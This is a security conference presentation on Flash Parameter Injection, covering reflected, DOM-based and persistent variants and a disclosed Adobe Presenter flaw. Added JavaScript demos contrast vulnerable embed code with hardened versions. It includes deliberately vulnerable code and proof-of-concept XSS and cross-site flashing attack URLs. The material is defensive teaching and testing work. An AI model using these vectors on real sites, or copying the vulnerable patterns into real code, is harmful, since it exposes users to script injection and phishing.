Flash Parameter Injection
Ayal Yogev, Adi Sharabani
IBM Rational Application Security {ayal, adish}
OWASP, 25/09/2008
The OWASP Foundation http://www.owasp.org
Agenda
• Flash 101
• Flash Security
• The Problem
• Flash Parameter Injection
• Real Example
• Testing
Background
• Introduced in 1996
• Adds animation and interactivity to Web pages
• Contains a scripting language: ActionScript
• Very popular: installed on over 99% of PCs (http://www.adobe.com/products/player_census/flashplayer/)
• Advanced technologies:
  • Flex
  • Adobe AIR
Accessing Flash movies
• Can be embedded in HTML pages:

<body>
<h1>My Flash Movie</h1>
<object type="application/x-shockwave-flash">
  <param name="allowScriptAccess" value="sameDomain" />
  <param name="movie" value="movie.swf" />
  <param name="quality" value="high" />
  <param name="bgcolor" value="#ffffff" />
  <embed src="movie.swf"></embed>
</object>
</body>

[Diagram: Host (Browser) loads the HTML, which hands the Flash Movie (SWF) to the Flash Player]
Accessing Flash movies
• Can be embedded in HTML pages
• Can be accessed directly: http://host/movie.swf
  • A "dummy" HTML page may be created by the browser (browser dependent)
  • DOM access according to policy
• Example (Firefox):

<html>
<body marginwidth="0" marginheight="0">
<embed width="100%" height="100%" name="plugin" src="http://host/movie.swf" type="application/x-shockwave-flash"/>
</body>
</html>
Global Flash Variables
• ActionScript supports global variables
• Global variables can be assigned from outside the movie
• Common use: a default value is only set when the variable was not supplied from outside

if (_root.myparam == undefined) {
    _root.myparam = "my default value";
}
Global Flash Variables
• ActionScript supports global variables
• Global variables can be assigned from outside the movie
• Assigning global variables as parameters:
  • Direct reference: http://host/movie.swf?a=5&b=hello
  • Embedded URI (query string on the movie URL):

<body>
<object type="application/x-shockwave-flash" data="movie.swf?a=5&b=hello" width="600" height="345">
</object>
</body>

  • Flash attributes (the flashvars attribute or FlashVars param):

<body>
<object type="application/x-shockwave-flash" data="movie.swf" flashvars="a=5&b=hello" width="600" height="345">
</object>
</body>
Previous Research
• Bypassing JavaScript Filters – the Flash! Attack, Eye on Security, August 2002
• Misuse of Macromedia Flash Ads clickTAG Option May Lead to Privacy Breach, Security Wire, April 2003
• Testing Flash Applications, Stefano Di Paola, May 2007
• Finding Vulnerabilities in Flash Applications, Stefano Di Paola, November 2007
Controlling Global Flash Variables can result in...
• Cross-Site Flashing
• Cross-Site Scripting through Flash
• Phishing
• Flow Manipulation
• ...
Cross-Site Flashing
• A vulnerable movie is tricked into loading a malicious movie
• The malicious movie gets access to the same sandbox
• Can be achieved using methods like loadMovie*:

if (_root.movieURI == undefined) {
    _root.movieURI = "http://host/movie.swf";
}
loadMovieNum(_root.movieURI, 1);

• Attack vector: http://host/movie.swf?movieURI=maliciousFile.swf

[Diagram: Flash Player runs the Flash Movie, which loads the Malicious Flash into the same sandbox]
Cross-Site Scripting through Flash
• Classic XSS using a vulnerable Flash file
• Can be triggered by the use of global Flash variables in:
  • getURL, using payload javascript:alert('XSS')
  • Load* functions, using payload asfunction:getURL,javascript:alert('XSS')
  • TextField.htmlText, using payload <img src='javascript:alert("XSS")//.jpg'>
  • ...
Cross-Site Scripting through Flash (Example)
• Consider movie.swf containing the code:

if (_root.url == undefined) {
    _root.url = "http://host/";
}
getURL(_root.url);

• Attack vector: http://host/movie.swf?url=javascript:alert('gotcha!')
The Missing Link
• Flash cannot always load without the original HTML
• Flash movies may rely on parts of the DOM to execute:
  • Use JavaScript variables and methods
  • Use HTML DOM elements
• Direct access to Flash may be restricted due to security

[Diagram: Host (Browser) with Flash Player and Flash Movie (SWF), shown once inside its HTML page and once loaded directly]
Known examples of Flash attacks involve accessing the movie directly
BUT... some Flash movies cannot load when accessed directly
FPI: injecting global variables into Flash in its original HTML environment
Reflected FPI
• Possible when the location of the Flash movie is retrieved through a URL parameter:

# Embed the Flash movie
print '<object type="application/x-shockwave-flash" data="' . $params{movie} . '"></object>';

• Attack example: http://host/index.cgi?movie=movie.swf?globalVar=e-v-i-l
• Resulting HTML:

<object type="application/x-shockwave-flash" data="movie.swf?globalVar=e-v-i-l"></object>
Reflected FPI (Piggybacking FlashVars)
• Attack possible when global Flash variables are received from HTML parameters without sanitization:

# Read the 'language' parameter and strip double quotes
my $language = $params{language};
$language =~ s/"//g;
# Embed the Flash movie
print '<object type="application/x-shockwave-flash" data="movie.swf" flashvars="language=' . $language . '"></object>';

• Attack occurs when the victim is lured to click on a link like:
  http://host/index.cgi?language=English%26globalVar=e-v-i-l
• %26 is decoded to & by the CGI layer, so stripping quotes does not help; the movie receives a second variable:

<object type="application/x-shockwave-flash" data="movie.swf" flashvars="language=English&globalVar=e-v-i-l">
</object>
FlashVars Injection
• Possible when an attribute of the object tag is received as a parameter:

# Embed the Flash movie
print "<object type='application/x-shockwave-flash' " .
      "data='movie.swf' width='" . $params{width} . "'></object>";

• Attack vector: http://host/index.cgi?width=600%27%20flashvars=%27globalVar=e-v-i-l
• Decoded value: 600' flashvars='globalVar=e-v-i-l
• Resulting HTML:

<object type='application/x-shockwave-flash' data='movie.swf' width='600' flashvars='globalVar=e-v-i-l'>
</object>
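The three reflected-FPI variants above (movie location from a parameter, piggybacked FlashVars, attribute injection), as an added example that is not part of the original presentation: a Node.js re-creation of the Perl CGI snippets, a hardened builder, and a small model of how the browser and Flash Player turn the resulting tag into _root globals. The regex attribute parser, the simplified FlashVars parsing and the movie allowlist (ALLOWED_MOVIES) are assumptions of this example, and the attack requests are constructed.

```javascript
// Added example, not from the slides: a Node.js stand-in for the Perl CGI on
// the three Reflected FPI slides. The embed*() builders reproduce each mistake,
// buildEmbedSafe() is the hardened form, and effectiveFlashVars() models what
// Flash Player receives as _root globals (query string of the movie URL merged
// with the flashvars attribute). The regex attribute parser and the movie
// allowlist are simplifications assumed by this example.

// Slide "Reflected FPI": movie location copied straight from a parameter.
function embedMovieFromParam(params) {
  return '<object type="application/x-shockwave-flash" data="' + params.movie + '"></object>';
}

// Slide "Piggybacking FlashVars": double quotes stripped, but '&' passes through.
function embedLanguage(params) {
  const language = String(params.language).replace(/"/g, '');
  return '<object type="application/x-shockwave-flash" data="movie.swf" flashvars="language=' +
    language + '"></object>';
}

// Slide "FlashVars Injection": an attribute value taken from a parameter.
function embedWidth(params) {
  return "<object type='application/x-shockwave-flash' data='movie.swf' width='" +
    params.width + "'></object>";
}

const ALLOWED_MOVIES = new Set(['movie.swf', 'intro.swf']); // assumed allowlist

function attrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened builder: allowlisted movie path, numeric width, URL-encoded FlashVars
// values (so '&' and '=' cannot add variables), attribute-encoded tag values.
function buildEmbedSafe(params) {
  const movie = ALLOWED_MOVIES.has(params.movie) ? params.movie : 'movie.swf';
  const w = Number(params.width);
  const width = Number.isInteger(w) && w > 0 ? w : 600;
  const flashvars = 'language=' + encodeURIComponent(String(params.language ?? 'English'));
  return '<object type="application/x-shockwave-flash" data="' + attrEncode(movie) +
    '" width="' + width + '" flashvars="' + attrEncode(flashvars) + '"></object>';
}

// Browser side: name="value" / name='value' pairs, entity-decoded.
function attrDecode(s) {
  const map = { '&amp;': '&', '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#39;': "'" };
  return s.replace(/&(?:amp|lt|gt|quot|#39);/g, m => map[m]);
}

function parseAttributes(html) {
  const attrs = {};
  const re = /([\w-]+)=(["'])(.*?)\2/g;
  let m;
  while ((m = re.exec(html)) !== null) attrs[m[1]] = attrDecode(m[3]);
  return attrs;
}

// Flash Player side: split FlashVars on '&' and '=', URL-decode each part.
function parseFlashVars(s) {
  const vars = {};
  for (const pair of (s || '').split('&')) {
    if (!pair) continue;
    const i = pair.indexOf('=');
    const k = i < 0 ? pair : pair.slice(0, i);
    const v = i < 0 ? '' : pair.slice(i + 1);
    vars[decodeURIComponent(k)] = decodeURIComponent(v);
  }
  return vars;
}

function effectiveFlashVars(html) {
  const attrs = parseAttributes(html);
  const movie = attrs.data || attrs.src || '';
  const qs = movie.includes('?') ? movie.slice(movie.indexOf('?') + 1) : '';
  return { ...parseFlashVars(qs), ...parseFlashVars(attrs.flashvars) };
}

// Constructed attack requests, already URL-decoded as the CGI layer would do
// (%26 -> '&', %27 -> "'", %20 -> ' ').
const ATTACKS = {
  movie: { movie: 'movie.swf?globalVar=e-v-i-l' },
  language: { language: 'English&globalVar=e-v-i-l' },
  width: { width: "600' flashvars='globalVar=e-v-i-l" },
};

// globalVar as the movie sees it: one entry per vulnerable builder, then the
// hardened builder against all three requests.
function demo() {
  return {
    movie: effectiveFlashVars(embedMovieFromParam(ATTACKS.movie)).globalVar,
    language: effectiveFlashVars(embedLanguage(ATTACKS.language)).globalVar,
    width: effectiveFlashVars(embedWidth(ATTACKS.width)).globalVar,
    safe: Object.values(ATTACKS).map(p => effectiveFlashVars(buildEmbedSafe(p)).globalVar),
  };
}

console.log(demo());
```

Run with `node`: the three vulnerable builders each yield `globalVar: 'e-v-i-l'`, while the hardened builder yields `undefined` for all three requests. Note that quote stripping alone (the `language` case) is useless against piggybacking, since the separator Flash Player cares about is `&`, and that the fix for FlashVars is encoding at two layers: URL-encoding each value for Flash Player, then attribute-encoding the whole string for the HTML parser.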
DOM Based FPI
• document.location is used as a global Flash variable:

<script type="text/javascript" language="JavaScript">
var s = '';
var loc = encodeURI(document.location);
s += '<object>';
s += ' <embed src="movie.swf" flashvars="location=' + loc + '">';
s += ' </embed>';
s += '</object>';
document.write(s);
</script>
DOM Based FPI (continued)
• Attack vector: http://host/index.htm#&globalVar=e-v-i-l
• The global variable is injected into the Flash movie embedded inside the DOM:

<object>
<embed src="movie.swf" flashvars="location=http://host/index.htm#&globalVar=e-v-i-l">
</embed>
</object>
DOM Based FPI (continued)
• The JavaScript function encodeURI is not sufficient in this case
  • Can prevent DOM based XSS but not DOM based FPI
  • Does not encode all characters (e.g. '&', '?', '=', '#'), since it treats its input as a complete URI and leaves URI delimiters alone
• encodeURIComponent, escape or similar methods must be used (escape is deprecated; encodeURIComponent is the one to use)
• Appropriate encoding must be used (depending on context)
• Attack is invisible to IDS and IPS
  • Data following '#' is not sent to the server ('?' also works, but data following it is sent to the server)
Persistent FPI
• Shared local Flash objects (a.k.a. Flash cookies)
• Used to store persistent data across multiple sessions and save Flash state
• Storing shared local Flash objects:

// Create a shared object
mySharedObject = SharedObject.getLocal("sharedObjName");
// Store data in the shared object
mySharedObject.data.name = "jsmith";
mySharedObject.data.homepage = "http://demo.testfire.net";
// Flush
mySharedObject.flush();
Persistent FPI (continued)
• Loading shared local Flash objects:

// Create a new shared object or read an existing one
mySharedObject = SharedObject.getLocal("sharedObjName");
// Check whether variable name exists
if (mySharedObject.data.name == null) {
    // Shared object doesn't exist
} else {
    // Read the name
    name = mySharedObject.data.name;
    // Read the homepage
    homepage = mySharedObject.data.homepage;
}
Persistent FPI (continued)
• Shared local Flash object is controlled by user input
• Object is used inside the getURL method:

// Create a new shared object or read an existing one
mySharedObject = SharedObject.getLocal("urlToLoad");
// Check whether there is a shared object saved
if (mySharedObject.data.url == null) {
    // Store the URL in a shared object
    mySharedObject.data.url = _root.inputURL;
}
// Get the URL
getURL(mySharedObject.data.url);

[Diagram: Host (Browser) and Flash Player loading the Flash Movie on the first visit, when inputURL is stored, and on later visits, when the stored URL is used]
Persistent FPI (continued)
• After the first infection, the XSS payload is executed every time the movie is loaded
• Attack can persist after the vulnerability is fixed, because the payload lives in the shared object, not in the movie
• IDS or IPS will only be able to detect the initial infection
Adobe Presenter FPI Vulnerability
• Illustration of the automatically created HTML:

function showFlash(swf, w, h, loop) {
    var myLocation = document.location;
    //...
    s += '<param name="FlashVars" value="' +
         'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />';
    //...
    document.write(s);
}

• The same function with encodeURI applied to document.location, which does not help, since '&' and '=' pass through encodeURI unchanged:

function showFlash(swf, w, h, loop) {
    var myLocation = encodeURI(document.location);
    //...
    s += '<param name="FlashVars" value="' +
         'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />';
    //...
    document.write(s);
}
Adobe Presenter FPI Vulnerability (continued)
• Movie Viewer.swf vulnerable to XSS through Flash:
  • Global parameter _url with payload "javascript:alert('XSS')"
  • Global parameter baseurl with payload "asfunction:getURL,javascript:alert('XSS')"
  • Works in Flash Player version 9,0,47,0 on both IE and Firefox
• DOM based FPI allows the Flash to load within the original HTML
• Invisible to IPS/IDS
• Vendors must recompile their Flash files to fix the problem
• Attack vector: http://host/index.htm#&_url=javascript:alert(document.domain)
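The DOM based FPI slides and the Adobe Presenter case above both come down to one question: what does the FlashVars string look like after document.location has gone through a given encoder? The following is an added example, not code from the presentation or from Adobe Presenter: it models the showFlash() wrapper outside a browser with a constructed document.location string, runs it through no encoding, encodeURI and encodeURIComponent, and reports which attacker-chosen globals reach the movie. The FlashVars parsing is a simplified model of Flash Player (split on '&' and '=', URL-decode), and the variable names initialURL, isMSIE and useBSM are taken from the slide.

```javascript
// Added example, not from the slides: a model of the Adobe Presenter showFlash()
// wrapper shown above, fed a constructed document.location string (no browser
// involved) through three encoders: none (the generated HTML), encodeURI (the
// insufficient fix) and encodeURIComponent (correct for a single FlashVars
// value). Flash Player's FlashVars parsing is simplified to split on '&' and
// '=' plus URL-decoding, and the Presenter variable names come from the slide.

const ENCODERS = {
  none: loc => loc,
  encodeURI: loc => encodeURI(loc),                   // leaves & ? = # as they are
  encodeURIComponent: loc => encodeURIComponent(loc), // encodes them
};

const PRESENTER_VARS = ['initialURL', 'isMSIE', 'useBSM'];

// The FlashVars string showFlash() writes into the <param> tag.
function buildFlashVars(encoder, location, isMSIE = false) {
  return 'initialURL=' + ENCODERS[encoder](location) + '&isMSIE=' + isMSIE + '&useBSM=false';
}

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Flash Player's view of a FlashVars string (simplified).
function parseFlashVars(s) {
  return Object.fromEntries(s.split('&').filter(Boolean).map(pair => {
    const i = pair.indexOf('=');
    return i < 0 ? [safeDecode(pair), ''] : [safeDecode(pair.slice(0, i)), safeDecode(pair.slice(i + 1))];
  }));
}

// What the movie receives: its initialURL plus any globals the URL smuggled in.
function evaluate(encoder, location) {
  const vars = parseFlashVars(buildFlashVars(encoder, location));
  const injected = Object.keys(vars).filter(k => !PRESENTER_VARS.includes(k));
  return { initialURL: vars.initialURL, injected, payloads: injected.map(k => vars[k]) };
}

// Constructed attack URL from the slide; the fragment never reaches the server,
// so server-side filters and IDS/IPS see only http://host/index.htm.
const ATTACK_LOCATION = 'http://host/index.htm#&_url=javascript:alert(document.domain)';

function report(location = ATTACK_LOCATION) {
  return Object.fromEntries(Object.keys(ENCODERS).map(e => [e, evaluate(e, location)]));
}

console.log(JSON.stringify(report(), null, 2));
```

With no encoding and with encodeURI the movie receives `_url=javascript:alert(document.domain)` and its own initialURL is truncated at the '#'; with encodeURIComponent the whole location survives as a single value and nothing extra is injected. The same run with `?&globalVar=e-v-i-l` in place of the fragment shows the '?' variant from the slide, the difference being only that the server gets to see that one.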
Testing
• Identify controlled Flash parameters:
  • Query parameters (from HTML)
  • FlashVars (from HTML)
  • Uninitialized variables, i.e. globals read before the movie assigns them (from ActionScript)
• Locate potentially dangerous code:
  • Where controlled Flash parameters are used inside methods like getURL, loadMovie, etc.
  • Save the sequences leading to potentially dangerous code
  • Associate each sequence with its parameter
Testing (continued)
• Mutation: inject values into the parameters
  • XSS: javascript:window.open('http://my.site')
  • XSF: http://my.site/movie.swf
  • Phishing: http://my.site
• Validation
  • Play the relevant sequences belonging to the mutated parameter
  • Verify test results:
    • Browser events
    • ActionScript level
• Test the Flash movie within its original HTML environment
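The first two testing steps (identify controlled parameters, locate the dangerous code they reach) can be done statically over ActionScript source when it is available. The following is an added example, not a tool from the presentation: a line-oriented, regex-based pass that collects _root/_level0 globals, tracks a value copied from one of them into a local name, and flags sink calls that use either. It is an approximation rather than a parser (it does not follow control flow or calls between functions). The sample sources are the snippets from the earlier slides plus one constructed variant that compares the global against a fixed value instead of passing it through, which the pass correctly leaves alone.

```javascript
// Added example, not from the slides: a small static pass over ActionScript 2
// source that carries out the first two testing steps above. It collects the
// externally settable globals (_root.x / _level0.x references) and flags sink
// calls (getURL, loadMovie*, loadVariables*) whose arguments use one of them,
// directly or through a variable assigned from one earlier in the file. It is
// line-oriented and regex-based, an approximation rather than a parser. The
// sample sources are the snippets from the earlier slides plus one constructed
// safe variant.

const SINKS = ['getURL', 'loadMovie', 'loadMovieNum', 'loadVariables', 'loadVariablesNum'];
const GLOBAL_RE = /\b(?:_root|_level0)\.([A-Za-z_$][\w$]*)/g;
// `x = _root.y` or `var x = _root.y`; x may be a dotted path such as so.data.url
const ALIAS_RE = /^\s*(?:var\s+)?([A-Za-z_$][\w$.]*)\s*=\s*(?:_root|_level0)\.([A-Za-z_$][\w$]*)/;
const SINK_RE = new RegExp('\\b(' + SINKS.join('|') + ')\\s*\\(([^;]*)\\)', 'g');
const escapeRe = s => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');

// Step 1: names that can be set from the query string or FlashVars.
function findControlledParams(src) {
  return [...new Set([...src.matchAll(GLOBAL_RE)].map(m => m[1]))];
}

// Step 2: sink calls reached by a controlled parameter, with the line number
// and the parameter to mutate in the next step.
function findDangerousUses(src, params = findControlledParams(src)) {
  const aliases = new Map(); // local name -> controlled global it was copied from
  const findings = [];
  src.split('\n').forEach((line, idx) => {
    const a = ALIAS_RE.exec(line);
    if (a && params.includes(a[2])) aliases.set(a[1], a[2]);
    for (const [, sink, args] of line.matchAll(SINK_RE)) {
      const direct = params.find(p => new RegExp('\\b(?:_root|_level0)\\.' + escapeRe(p) + '\\b').test(args));
      const alias = [...aliases.keys()].find(v => new RegExp('\\b' + escapeRe(v) + '\\b').test(args));
      if (direct || alias) {
        findings.push({ line: idx + 1, sink, param: direct || aliases.get(alias), code: line.trim() });
      }
    }
  });
  return findings;
}

// Constructed sample sources; the first three are the slide snippets.
const SAMPLES = {
  xss: [
    'if (_root.url == undefined) {',
    '    _root.url = "http://host/";',
    '}',
    'getURL(_root.url);',
  ].join('\n'),
  xsf: [
    'if (_root.movieURI == undefined) {',
    '    _root.movieURI = "http://host/movie.swf";',
    '}',
    'loadMovieNum(_root.movieURI, 1);',
  ].join('\n'),
  persistent: [
    'mySharedObject = SharedObject.getLocal("urlToLoad");',
    'if (mySharedObject.data.url == null) {',
    '    mySharedObject.data.url = _root.inputURL;',
    '}',
    'getURL(mySharedObject.data.url);',
  ].join('\n'),
  safe: [
    'var page = "home";',
    'if (_root.page == "about") {',
    '    page = "about";',
    '}',
    'getURL("http://host/" + page + ".html");',
  ].join('\n'),
};

function analyzeAll(samples = SAMPLES) {
  return Object.fromEntries(Object.entries(samples).map(([name, src]) =>
    [name, { params: findControlledParams(src), findings: findDangerousUses(src) }]));
}

console.log(JSON.stringify(analyzeAll(), null, 2));
```

Each finding names the sink, the line and the controlled parameter, which is exactly the pairing the mutation step needs: `url` goes to getURL (try the XSS payload), `movieURI` goes to loadMovieNum (try the XSF payload), and `inputURL` reaches getURL only through the shared object, which is the persistent case. The `safe` sample produces no finding because the global is only compared, never copied into the sink argument.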